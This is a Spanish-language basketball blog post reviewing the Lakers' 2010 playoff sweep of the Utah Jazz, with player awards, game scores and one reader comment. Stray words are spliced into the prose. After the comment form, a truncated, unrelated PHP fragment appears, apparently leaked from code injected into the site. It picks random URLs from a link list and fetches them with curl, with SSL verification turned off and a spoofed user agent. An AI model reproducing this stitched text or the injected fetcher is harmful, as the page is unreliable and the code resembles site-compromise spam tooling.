Playoffs 2009-2010: Semifinales de Conferencia Oeste (y II)

11 de May de 2010 por MagicJohnson32

boozLakers 4 – Jazz 0

“All hope is lost”. La portada de ayer del Salt Lake Tribune lo aseguraba. Los asientos vacíos en el EnergySolutions Arena lo atestiguaban. Una desventaja de 22 puntos en el segundo cuarto lo garantizaba. Por tercera temporada consecutiva Los Angeles Lakers han eliminado a los Utah Jazz, esta vez con un 4-0, el primero que encaja la franquicia mormona en toda su historia. Tres partidos igualados y un palmeo que quedó a milímetros de dar un triunfo es lo máximo que han obtenido unos esforzados Jazz, sin Okur, sin Kirilenko (salvo por un total de 29 minutos en los dos últimos partidos), sin nadie capaz de frenar a Kobe Bryant, sin nadie que hiciese sombra a Gasol.

De la mano de su pareja estelar, que posiblemente haya ofrecido en esta serie sus mejores actuaciones conjuntas de la temporada, los Lakers aseguraron los dos primeros partidos en casa tras desperdiciar una gran renta inicial pero con la capacidad para jugar mejor los minutos decisivos. En Salt Lake City, para el tercer partido de la serie, hicieron falta también los triples de Artest y el eterno clutch de Fisher. El magnífico final del partido, con algunos de los mejores minutos de baloncesto que hemos visto estos Playoffs, y culminado por el tiro fallado por Deron Williams y el palmeo de Matthews, sentenció la serie.

“All hope is lost”.

Sin esperanzas para los locales, el cuarto partido fue un trámite, además de una exhibición de poderío de los Lakers en general y de Pau Gasol en particular. La franquicia angelina logra así su cuarta victoria kobepaulockerconsecutiva fuera de casa para sellar una serie de Playoffs, tras las obtenidas en Oklahoma City y, el año pasado, en Orlando y Denver. Es la prueba de que las sensaciones y el rendimiento en regular season son poco más que eso, y que los Playoffs van de otra cosa. Van de experiencia, de mentalidad y de talento, y eso sobra en los Lakers.

Mientras los Jazz se despiden con la incógnita de saber si el de anoche fue el último partido de Boozer como local, los Lakers dispondrán de una semana antes del inicio de sus terceras Finales de Conferencia consecutivas, que arrancarán el lunes contra los Suns y que próximamente analizaremos en TJNBA.

Los vigentes campeones ya no sólo lo son; ahora también juegan como tales.

MVP: Uno, con 4 partidos de más de 30 puntos y con un 52% de acierto, además de casi 6 asistencias por partido. El otro, con medias de 23,5 puntos, 14,5 rebotes y casi 3 tapones. El primero se llama Kobe, el segundo se llama Pau, y juntos forman posiblemente la mejor pareja de la liga.

El rookie: Quién le iba a decir a Westley Matthews el verano pasado, tras no ser elegido por ningún equipo en el Draft, que jugaría más de 35 minutos por partido como titular en las semifinales del Oeste ante los defensores del título. Y, además, cumpliendo: más de 12 puntos, más de 5 rebotes. Pedirle que frenase a Bryant habría sido pedirle demasiado.

La sorpresa: A estas alturas de su existencia, lo que haga Fisher no debería de sorprender a nadie. Fue fundamental en el partido más importante de la serie y ha defendido dignamente a un Deron que tras exhibirse ante los Nuggets ha rendido bien ante los Lakers pero sin alcanzar las 10 asistencias ni el 50% en tiros en un solo partido de la serie.reverse

La decepción: Andrew Bynum empezó bien la eliminatoria pero ha desaparecido en los dos encuentros disputados en Salt Lake City. La semana de descanso de la que dispondrá antes del inicio de las finales de Conferencia le han de servir para recuperar su maltrecha rodilla.

El mayor esfuerzo en vano: Sobre Deron Williams y Carlos Boozer recaía toda la responsabilidad y han cumplido. Con altibajos, eso sí. Anoche, por ejemplo, no fue el mejor día ni del base ni del ala-pívot. Pese a todo, ellos han sido los principales responsables de poner en apuros a los Lakers en tres de los cuatro partidos de la eliminatoria.

Así lo hemos contado nosotros:

Jazz 99 – Lakers 104

Jazz 103 – Lakers 111

Lakers 111 – Jazz 110

Lakers 111 – Jazz 96

Comenta

Un comentario a esta entrada

  1. TheDeerHunter dice:
    #1

    Bueno… yo sigo diciendo que en apuros reales sólo el 3º.

    Odio ni parecer medio anti-laker… y jamás pensé que iba a decir esto: me duele un poco que un equipo como los Jazz de este año haya sido barrido por otro equipo que ni siquiera veo al 100%. Creo que no se lo merecían.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>